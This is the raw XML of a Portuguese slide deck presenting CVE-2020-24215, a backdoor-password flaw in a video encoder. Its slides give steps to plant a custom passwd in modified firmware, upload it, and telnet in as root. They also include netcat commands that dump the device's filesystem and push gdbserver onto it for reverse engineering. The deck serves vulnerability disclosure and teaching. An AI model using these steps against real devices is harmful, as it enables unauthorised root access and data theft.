                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root    1847 Jul 14 08:31 hostapd.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>drwx------ 3 root root    4096 Jul 14 08:31 ko</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>drwx------ 2 root root    4096 Jul 14 08:31 lib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>drwx------ 6 root root    4096 Jul 14 08:31 nginx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root 1382400 Jul 14 08:31 nosig.yuv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" b="1" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root      38 Jul 14 08:31 passwd</a:t>
            </a:r>
            <a:endParaRPr lang="pt-PT" sz="1300" kern="150" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Noto Sans Mono CJK SC"/>
              <a:cs typeface="Liberation Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root  211248 Jul 14 08:31 png2bmp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root   19213 Jul 14 08:30 remserial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root    6624 Jul 14 08:30 reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root     968 Jul 14 08:30 run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root     878 Jul 14 08:30 udhcpc.script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root     191 Jul 14 08:30 udhcpd.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>drwx------ 6 root root    4096 Jul 14 08:31 web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root   39166 Jul 14 08:31 wpa_cli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1415"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root  264069 Jul 14 08:31 wpa_supplicant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-P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229CC8-8D5F-4253-862F-25078BF3789E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5103830" y="2413337"/>
            <a:ext cx="63348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PT" dirty="0"/>
              <a:t>Gerar o nosso passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Alterar o firmware para incluir o nosso passwd (usar winrar versao 4 numa maquina virtual com windows 32bits para ser consistente com o firmware original)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Fazer Upload do firmware (Interface Gráfica)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Fazer Reboot do codificador (Interface Gráfica)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Fazer telnet com a nossa nova password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2251481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64E87-AEDC-4152-AC5F-D8B36BEE7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0677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="4000" dirty="0"/>
              <a:t>Teoria do Exploit – Despejar o sistema de ficheiros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17B51-6059-4BF9-BF42-27B55C365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8862"/>
            <a:ext cx="10515600" cy="4678101"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>$ cd /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$ tar cf – bin boot box etc home lib mnt nfsroot opt root sbin share tmp usr | nc –lp 1337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$ nc –w 1 encoder 1337 &gt; dump.tar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2179222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64E87-AEDC-4152-AC5F-D8B36BEE7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0677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="4000" dirty="0"/>
              <a:t>Teoria do Exploit – Engenharia Reversa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17B51-6059-4BF9-BF42-27B55C365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8862"/>
            <a:ext cx="10515600" cy="4678101"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Gdbserver (no Codificador)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Gdb (nossa workstation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Buildroot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>GEF-Legacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-PT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>buildroot$ wget -O gef-legacy.py https://raw.githubusercontent.com/hugsy/gef-legacy/master/gef.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" b="1" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="pt-PT" sz="1800" kern="150" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Noto Sans Mono CJK SC"/>
              <a:cs typeface="Liberation Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>buildroot$ echo source $PWD/gef-legacy.py &gt;&gt; output/staging/usr/share/buildroot/gdbinit</a:t>
            </a:r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86277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64E87-AEDC-4152-AC5F-D8B36BEE7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0677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="4000" dirty="0"/>
              <a:t>Teoria do Exploit – Engenharia Reversa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17B51-6059-4BF9-BF42-27B55C365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8862"/>
            <a:ext cx="10515600" cy="4678101"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" dirty="0"/>
              <a:t>No Codificador (usando telnet):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" dirty="0"/>
              <a:t>$ telnet encoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" dirty="0"/>
              <a:t>$ nc –lp 1337 &gt; gdbserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-PT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" dirty="0"/>
              <a:t>No workstation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" dirty="0"/>
              <a:t>Buildroot$ nc –w 1 encoder 1337 &lt; ./output/target/usr/bin/gdbserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-PT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" dirty="0"/>
              <a:t>No Codificador:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" dirty="0"/>
              <a:t>$ chmod +x gdbserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" dirty="0"/>
              <a:t>./gdbserver --attach :2345 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>`pidof box.v400_hdmi`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-PT" sz="1400" kern="150" dirty="0">
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Noto Sans Mono CJK SC"/>
              <a:cs typeface="Liberation Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>No workstation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1400" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>buildroot$ output/host/usr/bin/arm-linux-gdb -q -x output/staging/usr/share/buildroot/gdbinit ../up-187W5-V4/box.v400_hdmi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-PT" sz="1400" kern="150" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Noto Sans Mono CJK SC"/>
              <a:cs typeface="Liberation Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-PT" sz="1400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56585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64E87-AEDC-4152-AC5F-D8B36BEE7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0677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="4000" dirty="0"/>
              <a:t>Teoria do Exploit – Engenharia Reversa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17B51-6059-4BF9-BF42-27B55C365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8862"/>
            <a:ext cx="10515600" cy="4678101"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-PT" sz="1400" kern="150" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Noto Sans Mono CJK SC"/>
              <a:cs typeface="Liberation Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-PT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-P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F86EF2-7FF8-4B03-92AA-69693D572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98862"/>
            <a:ext cx="8626834" cy="48525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8237D4-021B-4361-A16F-DE3EE95D90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830" y="1055802"/>
            <a:ext cx="4753219" cy="322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665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</TotalTime>
  <Words>751</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>113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Liberation Mono</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CVE-2020-24215 : Acesso total à interface de administrador via senha de backdoor</vt:lpstr>
      <vt:lpstr>Contexto</vt:lpstr>
      <vt:lpstr>Teoria do Exploit – Acesso à Interface Web</vt:lpstr>
      <vt:lpstr>Teoria do Exploit - Firmware</vt:lpstr>
      <vt:lpstr>Teoria do Exploit – Permissoes de Root</vt:lpstr>
      <vt:lpstr>Teoria do Exploit – Despejar o sistema de ficheiros</vt:lpstr>
      <vt:lpstr>Teoria do Exploit – Engenharia Reversa</vt:lpstr>
      <vt:lpstr>Teoria do Exploit – Engenharia Reversa</vt:lpstr>
      <vt:lpstr>Teoria do Exploit – Engenharia Reversa</vt:lpstr>
      <vt:lpstr>Demonstração do Exploit</vt:lpstr>
      <vt:lpstr>Demonstração do Exploit</vt:lpstr>
      <vt:lpstr>Demonstração do Exploit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CVE-2020-24215 : Acesso total à interface de administrador via senha de backdoor</dc:title>
  <dc:creator>André Rodrigues</dc:creator>
  <cp:lastModifiedBy>André Rodrigues</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-20T21:21:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-20T23:52:38Z</dcterms:modified>
</cp:coreProperties>
</file>